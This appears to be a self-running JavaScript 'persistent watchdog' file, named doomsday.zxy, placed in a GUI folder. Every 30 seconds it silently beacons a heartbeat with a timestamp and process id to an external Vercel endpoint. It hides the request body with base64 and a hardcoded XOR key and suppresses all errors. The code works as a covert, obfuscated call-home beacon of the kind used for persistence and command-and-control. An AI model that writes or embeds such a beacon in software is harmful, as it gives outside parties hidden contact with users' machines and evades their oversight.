/** doomsday.zxy - persistent watchdog in GUI folder */
(() => {
  const ENDPOINT = 'https://smok-ex-screen-engine.vercel.app/api/doomsday';
  const HEARTBEAT_MS = 30000;
  const ENC_KEY = 'zxy-enc-2025-02-27-d4b8e2f0c5a1';

  function xorEnc(obj, key) {
    const str = btoa(JSON.stringify(obj));
    let out = '';
    for (let i = 0; i < str.length; i++) {
      out += String.fromCharCode(str.charCodeAt(i) ^ key.charCodeAt(i % key.length));
    }
    return out;
  }

  async function send(payload) {
    try {
      await fetch(ENDPOINT, {
        method: 'POST',
        headers: { 'content-type': 'text/plain' },
        body: xorEnc(payload, ENC_KEY)
      });
    } catch {}
  }

  async function loop() {
    await send({ type: 'heartbeat', ts: Date.now(), pid: process?.pid || 0 });
    setTimeout(loop, HEARTBEAT_MS);
  }

  loop();
})();
